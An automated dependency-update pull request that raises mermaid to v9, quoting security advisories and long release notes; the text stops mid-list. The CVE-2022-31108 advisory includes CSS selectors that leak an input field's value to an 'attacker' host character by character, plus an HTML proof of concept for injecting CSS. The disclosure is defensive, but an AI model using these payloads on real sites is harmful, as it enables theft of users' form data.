chore(deps): update dependency mermaid to v9 [security]

[renovate[bot]]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
mermaid	^8.10.2 -> ^9.0.0

GitHub Vulnerability Alerts

CVE-2021-35513

Mermaid before 8.11.0 allows XSS when the antiscript feature is used.

CVE-2021-43861

Impact

Malicious diagrams can contain javascript code that can be run at diagram readers machines.

Patches

The users should upgrade to version 8.13.8

Workarounds

You need to upgrade in order to avoid this issue.

CVE-2022-31108

An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.

The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the value attribute one character at a time. Whenever there is an actual match, an http request will be made by the browser in order to "load" a background image that will let an attacker know what's the value of the character.

input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

• Open an issue in example link to repo
• Email us at example email address

Product

mermaid.js

Tested Version

v9.1.1

Details

Issue 1: Multiple CSS Injection (GHSL-2022-036)

By supplying a carefully crafted textColor theme variable, an attacker can inject arbitrary CSS rules into the document. In the following snippet we can see that getStyles does not sanitize any of the theme variables leaving the door open for CSS injection.

Snippet from src/styles.js:

const getStyles = (type, userStyles, options) => {
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }

For example, if we set textColor to "green;} #target { background-color: crimson }" the resulting CSS will contain a new selector #target that will apply a crimson background color to an arbitrary element.

<html>

<body>
    <div id="target">
        <h1>This element does not belong to the SVG but we can style it</h1>
    </div>
    <svg id="diagram">
    </svg>

    <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
    <script>
        mermaid.initialize({ startOnLoad: false });

        const graph =
            `
            %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
            graph TD
                A[Goose]
            `

        const diagram = document.getElementById("diagram")
        const svg = mermaid.render('diagram-svg', graph)
        diagram.innerHTML = svg
    </script>
</body>

</html>

In the proof of concept above we used the textColor variable to inject CSS, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:

• https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/mermaidAPI.js#L393
• https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/styles.js#L35

Impact

This issue may lead to Information Disclosure via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.

Remediation

Ensure that user input is adequately escaped before embedding it in CSS blocks.

---

Release Notes

mermaid-js/mermaid (mermaid)

### [`v9.1.2`](https://togithub.com/mermaid-js/mermaid/releases/tag/9.1.2) [Compare Source](https://togithub.com/mermaid-js/mermaid/compare/9.1.1...9.1.2) ### Release Notes #### 🚀 Features - Add support for cyclic themeVariable rotation when more than 8 branches ([#​3049](https://togithub.com/mermaid-js/mermaid/issues/3049)) [@​ashishjain0512](https://togithub.com/ashishjain0512) - [#​3060](https://togithub.com/mermaid-js/mermaid/issues/3060) support cherry commit in gitgraph ([#​3115](https://togithub.com/mermaid-js/mermaid/issues/3115)) [@​ashishjain0512](https://togithub.com/ashishjain0512) - [#​3080](https://togithub.com/mermaid-js/mermaid/issues/3080) Adding rotated commit label functionality ([#​3113](https://togithub.com/mermaid-js/mermaid/issues/3113)) [@​ashishjain0512](https://togithub.com/ashishjain0512) - feat: adding "Critical Region"/"Option" and "Break" blocks to sequence diagram ([#​3063](https://togithub.com/mermaid-js/mermaid/issues/3063)) [@​financelurker](https://togithub.com/financelurker) - \[Experimental] Add C4 Diagram. Compatible with C4-PlantUML syntax. ([#​3038](https://togithub.com/mermaid-js/mermaid/issues/3038)) [@​pinghe](https://togithub.com/pinghe) #### Bug Fixes & Cleanup - [#​3050](https://togithub.com/mermaid-js/mermaid/issues/3050) Renaming setTitle to setAccTitle ([#​3051](https://togithub.com/mermaid-js/mermaid/issues/3051)) [@​knsv](https://togithub.com/knsv) - Fix for case where a compound state has a transition to it self. ([#​3092](https://togithub.com/mermaid-js/mermaid/issues/3092)) [@​knsv](https://togithub.com/knsv) - Handle diagram paddings in a consistent way ([#​3118](https://togithub.com/mermaid-js/mermaid/issues/3118)) [@​knsv](https://togithub.com/knsv) - Separation between title and accessibility title (sometimes) ([#​3075](https://togithub.com/mermaid-js/mermaid/issues/3075)) [@​knsv](https://togithub.com/knsv) - Removed unnecessary textLength attribute. ([#​3057](https://togithub.com/mermaid-js/mermaid/issues/3057)) [@​mgenereu](https://togithub.com/mgenereu) - Removed the Sass files ([#​3114](https://togithub.com/mermaid-js/mermaid/issues/3114)) [@​siddhant-tripathy1](https://togithub.com/siddhant-tripathy1) #### Documentation - Make initThrowsErrors available to clients ([#​3052](https://togithub.com/mermaid-js/mermaid/issues/3052)) [@​MindaugasLaganeckas](https://togithub.com/MindaugasLaganeckas) - Styling links default ([#​3120](https://togithub.com/mermaid-js/mermaid/issues/3120)) [@​flywire](https://togithub.com/flywire) - \[Documentation] Re-order theme variables ([#​3030](https://togithub.com/mermaid-js/mermaid/issues/3030)) [@​sylhare](https://togithub.com/sylhare) - \[Documentation] Use actual theme name ([#​3054](https://togithub.com/mermaid-js/mermaid/issues/3054)) [@​sylhare](https://togithub.com/sylhare) - Fixed whitespace typo in Class diagram ([#​3035](https://togithub.com/mermaid-js/mermaid/issues/3035)) [@​SlideeScherz](https://togithub.com/SlideeScherz) - Fixing various typos ([#​3094](https://togithub.com/mermaid-js/mermaid/issues/3094)) [@​deining](https://togithub.com/deining) - docs: fix capitalisation of well known technologies ([#​3064](https://togithub.com/mermaid-js/mermaid/issues/3064)) [@​detj](https://togithub.com/detj) - docs: remove edit on GitHub duplicate ([#​3059](https://togithub.com/mermaid-js/mermaid/issues/3059)) [@​schmelto](https://togithub.com/schmelto) - typos in configuration.md corrected ([#​3122](https://togithub.com/mermaid-js/mermaid/issues/3122)) [@​activus-d](https://togithub.com/activus-d) #### Dependecy updates - chore(deps): bump dompurify from 2.3.6 to 2.3.8 ([#​3045](https://togithub.com/mermaid-js/mermaid/issues/3045)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​applitools/eyes-cypress](https://togithub.com/applitools/eyes-cypress) from 3.25.7 to 3.26.0 ([#​3071](https://togithub.com/mermaid-js/mermaid/issues/3071)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​applitools/eyes-cypress](https://togithub.com/applitools/eyes-cypress) from 3.26.0 to 3.26.1 ([#​3105](https://togithub.com/mermaid-js/mermaid/issues/3105)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​applitools/eyes-cypress](https://togithub.com/applitools/eyes-cypress) from 3.26.1 to 3.26.2 ([#​3136](https://togithub.com/mermaid-js/mermaid/issues/3136)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/core](https://togithub.com/babel/core) from 7.17.10 to 7.18.0 ([#​3069](https://togithub.com/mermaid-js/mermaid/issues/3069)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/core](https://togithub.com/babel/core) from 7.18.0 to 7.18.2 ([#​3083](https://togithub.com/mermaid-js/mermaid/issues/3083)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/core](https://togithub.com/babel/core) from 7.18.2 to 7.18.5 ([#​3134](https://togithub.com/mermaid-js/mermaid/issues/3134)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/eslint-parser](https://togithub.com/babel/eslint-parser) from 7.17.0 to 7.18.2 ([#​3087](https://togithub.com/mermaid-js/mermaid/issues/3087)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/preset-env](https://togithub.com/babel/preset-env) from 7.17.10 to 7.18.0 ([#​3068](https://togithub.com/mermaid-js/mermaid/issues/3068)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/preset-env](https://togithub.com/babel/preset-env) from 7.18.0 to 7.18.2 ([#​3084](https://togithub.com/mermaid-js/mermaid/issues/3084)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​commitlint/cli](https://togithub.com/commitlint/cli) from 16.2.4 to 16.3.0 ([#​3040](https://togithub.com/mermaid-js/mermaid/issues/3040)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​commitlint/cli](https://togithub.com/commitlint/cli) from 16.3.0 to 17.0.0 ([#​3070](https://togithub.com/mermaid-js/mermaid/issues/3070)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​commitlint/cli](https://togithub.com/commitlint/cli) from 17.0.0 to 17.0.1 ([#​3086](https://togithub.com/mermaid-js/mermaid/issues/3086)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​commitlint/cli](https://togithub.com/commitlint/cli) from 17.0.1 to 17.0.2 ([#​3102](https://togithub.com/mermaid-js/mermaid/issues/3102)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​commitlint/config-conventional](https://togithub.com/commitlint/config-conventional) from 16.2.4 to 17.0.0 ([#​3067](https://togithub.com/mermaid-js/mermaid/issues/3067)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​commitlint/config-conventional](https://togithub.com/commitlint/config-conventional) from 17.0.0 to 17.0.2 ([#​3104](https://togithub.com/mermaid-js/mermaid/issues/3104)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump babel-jest from 28.1.0 to 28.1.1 ([#​3137](https://togithub.com/mermaid-js/mermaid/issues/3137)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump concurrently from 7.1.0 to 7.2.0 ([#​3039](https://togithub.com/mermaid-js/mermaid/issues/3039)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump concurrently from 7.2.0 to 7.2.1 ([#​3065](https://togithub.com/mermaid-js/mermaid/issues/3065)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump cypress from 9.6.0 to 9.6.1 ([#​3041](https://togithub.com/mermaid-js/mermaid/issues/3041)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump cypress from 9.6.1 to 9.7.0 ([#​3082](https://togithub.com/mermaid-js/mermaid/issues/3082)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint from 8.15.0 to 8.16.0 ([#​3066](https://togithub.com/mermaid-js/mermaid/issues/3066)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint from 8.16.0 to 8.17.0 ([#​3103](https://togithub.com/mermaid-js/mermaid/issues/3103)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint from 8.4.1 to 8.15.0 ([#​3042](https://togithub.com/mermaid-js/mermaid/issues/3042)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jest from 26.1.5 to 26.2.2 ([#​3044](https://togithub.com/mermaid-js/mermaid/issues/3044)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jest from 26.2.2 to 26.4.5 ([#​3085](https://togithub.com/mermaid-js/mermaid/issues/3085)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jest from 26.4.5 to 26.5.3 ([#​3110](https://togithub.com/mermaid-js/mermaid/issues/3110)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 39.2.9 to 39.3.0 ([#​3072](https://togithub.com/mermaid-js/mermaid/issues/3072)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 39.3.0 to 39.3.2 ([#​3088](https://togithub.com/mermaid-js/mermaid/issues/3088)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump jest from 28.1.0 to 28.1.1 ([#​3131](https://togithub.com/mermaid-js/mermaid/issues/3131)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump jest-environment-jsdom from 28.1.0 to 28.1.1 ([#​3129](https://togithub.com/mermaid-js/mermaid/issues/3129)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump lint-staged from 12.4.1 to 12.4.2 ([#​3081](https://togithub.com/mermaid-js/mermaid/issues/3081)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump lint-staged from 12.4.2 to 13.0.0 ([#​3109](https://togithub.com/mermaid-js/mermaid/issues/3109)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump lint-staged from 13.0.0 to 13.0.1 ([#​3132](https://togithub.com/mermaid-js/mermaid/issues/3132)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump terser-webpack-plugin from 5.3.1 to 5.3.3 ([#​3106](https://togithub.com/mermaid-js/mermaid/issues/3106)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack from 5.72.0 to 5.72.1 ([#​3043](https://togithub.com/mermaid-js/mermaid/issues/3043)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack from 5.72.1 to 5.73.0 ([#​3108](https://togithub.com/mermaid-js/mermaid/issues/3108)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack-cli from 4.9.2 to 4.10.0 ([#​3130](https://togithub.com/mermaid-js/mermaid/issues/3130)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack-dev-server from 4.9.0 to 4.9.1 ([#​3107](https://togithub.com/mermaid-js/mermaid/issues/3107)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack-dev-server from 4.9.1 to 4.9.2 ([#​3133](https://togithub.com/mermaid-js/mermaid/issues/3133)) [@​dependabot](https://togithub.com/dependabot) 🎉 **Thanks to all contributors helping with this release!** 🎉 ### [`v9.1.1`](https://togithub.com/mermaid-js/mermaid/releases/tag/9.1.1) [Compare Source](https://togithub.com/mermaid-js/mermaid/compare/9.1.0...9.1.1) ### Release Notes - Fix for [#​3025](https://togithub.com/mermaid-js/mermaid/issues/3025) [@​ashishjain0512](https://togithub.com/ashishjain0512) 🎉 **Thanks to all contributors helping with this release!** 🎉 ### [`v9.1.0`](https://togithub.com/mermaid-js/mermaid/releases/tag/9.1.0) [Compare Source](https://togithub.com/mermaid-js/mermaid/compare/9.0.1...9.1.0) ### Release Notes #### 🚀 Features - Accessibility added to the charts ([#​3008](https://togithub.com/mermaid-js/mermaid/issues/3008)) ([#​2732](https://togithub.com/mermaid-js/mermaid/issues/2732)) [@​knsv](https://togithub.com/knsv) [@​gwincr11](https://togithub.com/gwincr11) [@​therzka](https://togithub.com/therzka) [@​khiga8](https://togithub.com/khiga8) [@​el-mapache](https://togithub.com/el-mapache) [@​lindseywild](https://togithub.com/lindseywild) - feat: add hideUnusedParticipants and some cleanup ([#​2943](https://togithub.com/mermaid-js/mermaid/issues/2943)) [@​Yash-Singh1](https://togithub.com/Yash-Singh1) - Added default new line in the diagram text before parsing for special… ([#​2983](https://togithub.com/mermaid-js/mermaid/issues/2983)) [@​ashishjain0512](https://togithub.com/ashishjain0512) - Added support to change the position of the main branch ([#​3010](https://togithub.com/mermaid-js/mermaid/issues/3010)) [@​ashishjain0512](https://togithub.com/ashishjain0512) - Sequence autonumbering and Git fix options parsing ([#​2981](https://togithub.com/mermaid-js/mermaid/issues/2981)) [@​Zumbala](https://togithub.com/Zumbala) - GitGraph: add support for branch ordering ([#​3002](https://togithub.com/mermaid-js/mermaid/issues/3002)) [@​husa](https://togithub.com/husa) - fix mermaidAPI.parse() behavior to match documentation, add tests to ensure behavior matches docs ([#​3004](https://togithub.com/mermaid-js/mermaid/issues/3004)) [@​timmaffett](https://togithub.com/timmaffett) - protect config.js from attempting to use invalid theme name (which corrupted mermaid use until reset()) ([#​2987](https://togithub.com/mermaid-js/mermaid/issues/2987)) [@​timmaffett](https://togithub.com/timmaffett) - Handling flowchart link style for html labels using legacy renderer [#​2951](https://togithub.com/mermaid-js/mermaid/issues/2951) #### Documentation - Doc/update zh readme ([#​3005](https://togithub.com/mermaid-js/mermaid/issues/3005)) [@​lexmin0412](https://togithub.com/lexmin0412) - Documentation fix for 8.6.0 readme - add missing quotes to example theme default ([#​2986](https://togithub.com/mermaid-js/mermaid/issues/2986)) [@​timmaffett](https://togithub.com/timmaffett) - Fix typos in gitgraph.md ([#​2999](https://togithub.com/mermaid-js/mermaid/issues/2999)) [@​Lance-DC](https://togithub.com/Lance-DC) - Remove a stray word ([#​2974](https://togithub.com/mermaid-js/mermaid/issues/2974)) [@​egnor](https://togithub.com/egnor) - Update README.md ([#​2989](https://togithub.com/mermaid-js/mermaid/issues/2989)) [@​guidanoli](https://togithub.com/guidanoli) #### Dependecy updates - chore(deps): Included dependency review ([#​2984](https://togithub.com/mermaid-js/mermaid/issues/2984)) [@​naveensrinivasan](https://togithub.com/naveensrinivasan) - chore(deps): bump stylis from 4.1.0 to 4.1.1 ([#​2967](https://togithub.com/mermaid-js/mermaid/issues/2967)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/core](https://togithub.com/babel/core) from 7.17.9 to 7.17.10 ([#​2996](https://togithub.com/mermaid-js/mermaid/issues/2996)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/preset-env](https://togithub.com/babel/preset-env) from 7.16.11 to 7.17.10 ([#​2991](https://togithub.com/mermaid-js/mermaid/issues/2991)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​commitlint/cli](https://togithub.com/commitlint/cli) from 16.2.3 to 16.2.4 ([#​2992](https://togithub.com/mermaid-js/mermaid/issues/2992)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​commitlint/config-conventional](https://togithub.com/commitlint/config-conventional) from 16.2.1 to 16.2.4 ([#​2997](https://togithub.com/mermaid-js/mermaid/issues/2997)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump babel-jest from 27.5.1 to 28.0.3 ([#​2990](https://togithub.com/mermaid-js/mermaid/issues/2990)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump babel-jest from 28.0.3 to 28.1.0 ([#​3013](https://togithub.com/mermaid-js/mermaid/issues/3013)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump babel-loader from 8.2.4 to 8.2.5 ([#​2964](https://togithub.com/mermaid-js/mermaid/issues/2964)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump cypress from 9.5.4 to 9.6.0 ([#​2998](https://togithub.com/mermaid-js/mermaid/issues/2998)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint from 8.13.0 to 8.14.0 ([#​2966](https://togithub.com/mermaid-js/mermaid/issues/2966)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint from 8.14.0 to 8.15.0 ([#​3015](https://togithub.com/mermaid-js/mermaid/issues/3015)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jest from 26.1.4 to 26.1.5 ([#​2965](https://togithub.com/mermaid-js/mermaid/issues/2965)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 39.2.2 to 39.2.8 ([#​2968](https://togithub.com/mermaid-js/mermaid/issues/2968)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 39.2.8 to 39.2.9 ([#​2994](https://togithub.com/mermaid-js/mermaid/issues/2994)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump husky from 7.0.4 to 8.0.0 ([#​3016](https://togithub.com/mermaid-js/mermaid/issues/3016)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump jest from 27.5.1 to 28.0.3 ([#​2995](https://togithub.com/mermaid-js/mermaid/issues/2995)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump lint-staged from 12.3.8 to 12.4.0 ([#​2969](https://togithub.com/mermaid-js/mermaid/issues/2969)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump lint-staged from 12.4.0 to 12.4.1 ([#​2993](https://togithub.com/mermaid-js/mermaid/issues/2993)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack-dev-server from 4.8.1 to 4.9.0 ([#​3014](https://togithub.com/mermaid-js/mermaid/issues/3014)) [@​dependabot](https://togithub.com/dependabot) - chore: Enable codeql action ([#​2982](https://togithub.com/mermaid-js/mermaid/issues/2982)) [@​naveensrinivasan](https://togithub.com/naveensrinivasan) - chore: Set permissions for GitHub actions ([#​2971](https://togithub.com/mermaid-js/mermaid/issues/2971)) [@​naveensrinivasan](https://togithub.com/naveensrinivasan) 🎉 **Thanks to all contributors helping with this release!** 🎉 ### [`v9.0.1`](https://togithub.com/mermaid-js/mermaid/releases/tag/9.0.1) [Compare Source](https://togithub.com/mermaid-js/mermaid/compare/9.0.0...9.0.1) ### Release Notes #### 🐛 Bug Fixes - Removal of vulnerability ([#​2958](https://togithub.com/mermaid-js/mermaid/issues/2958)) [@​knsv](https://togithub.com/knsv) - Fix broken re-rendering of gitGraph in Mermaid Live Editor 🎉 **Thanks to all contributors helping with this release!** 🎉 ### [`v9.0.0`](https://togithub.com/mermaid-js/mermaid/releases/tag/9.0.0) [Compare Source](https://togithub.com/mermaid-js/mermaid/compare/8.14.0...9.0.0) ### Release Notes ### Main feature - 1252 gitgraph reinvented ([#​2877](https://togithub.com/mermaid-js/mermaid/issues/2877)) [@​knsv](https://togithub.com/knsv) Moving the gitGraph from experimental alpha status to a fully supported diagram type which handles theming and directives. The grammar has changed slightly from the alpha version, and no longer supports reset operations and some internal fast-forwarding has been removed for simplicity. Some few GitGraphs based on the alpha version might break with the update. **This is the reason for the major version number update**. We now support: - Commit types - Multiple branches in sperate lanes - Theming #### Other changes: - Add dompurify config option ([#​2831](https://togithub.com/mermaid-js/mermaid/issues/2831)) [@​gwincr11](https://togithub.com/gwincr11) - Class diagram accessibility ([#​2911](https://togithub.com/mermaid-js/mermaid/issues/2911)) [@​gwincr11](https://togithub.com/gwincr11) - Double Circle Node Shape ([#​2740](https://togithub.com/mermaid-js/mermaid/issues/2740)) [@​Guy-Adler](https://togithub.com/Guy-Adler) - ER and Sequence Chart Accessibility ([#​2832](https://togithub.com/mermaid-js/mermaid/issues/2832)) [@​gwincr11](https://togithub.com/gwincr11) - SequenceDiagram: Use correct default sans-serif fonts for actors and tasks ([#​2729](https://togithub.com/mermaid-js/mermaid/issues/2729)) [@​dbartholomae](https://togithub.com/dbartholomae) - Update to latest version of sanitize-url ([#​2790](https://togithub.com/mermaid-js/mermaid/issues/2790)) [@​dbussink](https://togithub.com/dbussink) - feat: add accessibility title and description to pie chart ([#​2747](https://togithub.com/mermaid-js/mermaid/issues/2747)) [@​gwincr11](https://togithub.com/gwincr11) - sync Chinese readme ([#​2797](https://togithub.com/mermaid-js/mermaid/issues/2797)) [@​lexmin0412](https://togithub.com/lexmin0412) - small bug with the id on the title ([#​2773](https://togithub.com/mermaid-js/mermaid/issues/2773)) [@​gwincr11](https://togithub.com/gwincr11) - fix: autonumber bug ([#​2814](https://togithub.com/mermaid-js/mermaid/issues/2814)) [@​kerwin612](https://togithub.com/kerwin612) ### Documentation updates - Add `mkdocs-material` to the integrations ([#​2780](https://togithub.com/mermaid-js/mermaid/issues/2780)) [@​chrimaho](https://togithub.com/chrimaho) - Added technical sequence diagram to example docs ([#​2836](https://togithub.com/mermaid-js/mermaid/issues/2836)) [@​riaanduplessis](https://togithub.com/riaanduplessis) - Fix typo in flowchart.md ([#​2741](https://togithub.com/mermaid-js/mermaid/issues/2741)) [@​mingpepe](https://togithub.com/mingpepe) - Fixes syntax error in n00b-gettingStarted.md ([#​2735](https://togithub.com/mermaid-js/mermaid/issues/2735)) [@​bolshoytoster](https://togithub.com/bolshoytoster) - Render example instead of just showing the code ([#​2835](https://togithub.com/mermaid-js/mermaid/issues/2835)) [@​Kaligule](https://togithub.com/Kaligule) - Switch to gender neutral terms ([#​2876](https://togithub.com/mermaid-js/mermaid/issues/2876)) [@​inclusive-coding-bot](https://togithub.com/inclusive-coding-bot) - Update theming.md ([#​2855](https://togithub.com/mermaid-js/mermaid/issues/2855)) [@​Crocin](https://togithub.com/Crocin) - Updated docs to use mermaid 8.14 ([#​2819](https://togithub.com/mermaid-js/mermaid/issues/2819)) [@​RonaldZielaznicki](https://togithub.com/RonaldZielaznicki) - Workflow: Check if `README.md` and `docs/README.md` are in sync ([#​2755](https://togithub.com/mermaid-js/mermaid/issues/2755)) [@​kuanyi-ng](https://togithub.com/kuanyi-ng) - docs(README\*.md): http => https ([#​2727](https://togithub.com/mermaid-js/mermaid/issues/2727)) [@​Schweinepriester](https://togithub.com/Schweinepriester) - docs(integrations): add link to mdbook-mermaid ([#​2786](https://togithub.com/mermaid-js/mermaid/issues/2786)) [@​lukehsiao](https://togithub.com/lukehsiao) - docs: Add GitHub native support ([#​2725](https://togithub.com/mermaid-js/mermaid/issues/2725)) [@​BastianZim](https://togithub.com/BastianZim) - docs: Add Gitea ([#​2731](https://togithub.com/mermaid-js/mermaid/issues/2731)) [@​silverwind](https://togithub.com/silverwind) - docs: `livebook` and `exdocs` integrations ([#​2728](https://togithub.com/mermaid-js/mermaid/issues/2728)) [@​RudolfMan](https://togithub.com/RudolfMan) - docs: add showData config to Pie Chart ([#​2758](https://togithub.com/mermaid-js/mermaid/issues/2758)) [@​uskey512](https://togithub.com/uskey512) - docs: adds alt text to images, corrects heading structure ([#​2908](https://togithub.com/mermaid-js/mermaid/issues/2908)) [@​lindseywild](https://togithub.com/lindseywild) - fix typos in doc ([#​2787](https://togithub.com/mermaid-js/mermaid/issues/2787)) [@​dkkb](https://togithub.com/dkkb) ### Dependency updates - chore(deps): bump EndBug/add-and-commit from 8.0.1 to 8.0.2 ([#​2722](https://togithub.com/mermaid-js/mermaid/issues/2722)) [@​dependabot](https://togithub.com/dependabot) - chore(deps): bump EndBug/add-and-commit from 8.0.2 to 9 ([#​2823](https://togithub.com/mermaid-js/mermaid/issues/2823)) [@​dependabot](https://togithub.com/dependabot) - chore(deps): bump actions/checkout from 2 to 3 ([#​2803](https://togithub.com/mermaid-js/mermaid/issues/2803)) [@​dependabot](https://togithub.com/dependabot) - chore(deps): bump actions/setup-node from 2 to 3 ([#​2784](https://togithub.com/mermaid-js/mermaid/issues/2784)) [@​dependabot](https://togithub.com/dependabot) - chore(deps): bump dompurify from 2.3.5 to 2.3.6 ([#​2763](https://togithub.com/mermaid-js/mermaid/issues/2763)) [@​dependabot](https://togithub.com/dependabot) - chore(deps): bump follow-redirects from 1.14.7 to 1.14.8 ([#​2711](https://togithub.com/mermaid-js/mermaid/issues/2711)) [@​dependabot](https://togithub.com/dependabot) - chore(deps): bump minimist from 1.2.5 to 1.2.6 ([#​2868](https://togithub.com/mermaid-js/mermaid/issues/2868)) [@​dependabot](https://togithub.com/dependabot) - chore(deps): bump node-forge from 1.2.1 to 1.3.0 ([#​2847](https://togithub.com/mermaid-js/mermaid/issues/2847)) [@​dependabot](https://togithub.com/dependabot) - chore(deps): bump stylis from 4.0.13 to 4.1.0 ([#​2891](https://togithub.com/mermaid-js/mermaid/issues/2891)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/core](https://togithub.com/babel/core) from 7.17.0 to 7.17.2 ([#​2716](https://togithub.com/mermaid-js/mermaid/issues/2716)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/core](https://togithub.com/babel/core) from 7.17.2 to 7.17.5 ([#​2766](https://togithub.com/mermaid-js/mermaid/issues/2766)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/core](https://togithub.com/babel/core) from 7.17.5 to 7.17.8 ([#​2838](https://togithub.com/mermaid-js/mermaid/issues/2838)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/register](https://togithub.com/babel/register) from 7.17.0 to 7.17.7 ([#​2844](https://togithub.com/mermaid-js/mermaid/issues/2844)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​commitlint/cli](https://togithub.com/commitlint/cli) from 16.1.0 to 16.2.1 ([#​2719](https://togithub.com/mermaid-js/mermaid/issues/2719)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​commitlint/cli](https://togithub.com/commitlint/cli) from 16.2.1 to 16.2.3 ([#​2843](https://togithub.com/mermaid-js/mermaid/issues/2843)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​commitlint/config-conventional](https://togithub.com/commitlint/config-conventional) from 16.0.0 to 16.2.1 ([#​2718](https://togithub.com/mermaid-js/mermaid/issues/2718)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​percy/cli](https://togithub.com/percy/cli) from 1.0.0-beta.74 to 1.0.0-beta.75 ([#​2715](https://togithub.com/mermaid-js/mermaid/issues/2715)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​percy/cli](https://togithub.com/percy/cli) from 1.0.0-beta.75 to 1.0.0-beta.76 ([#​2782](https://togithub.com/mermaid-js/mermaid/issues/2782)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump babel-jest from 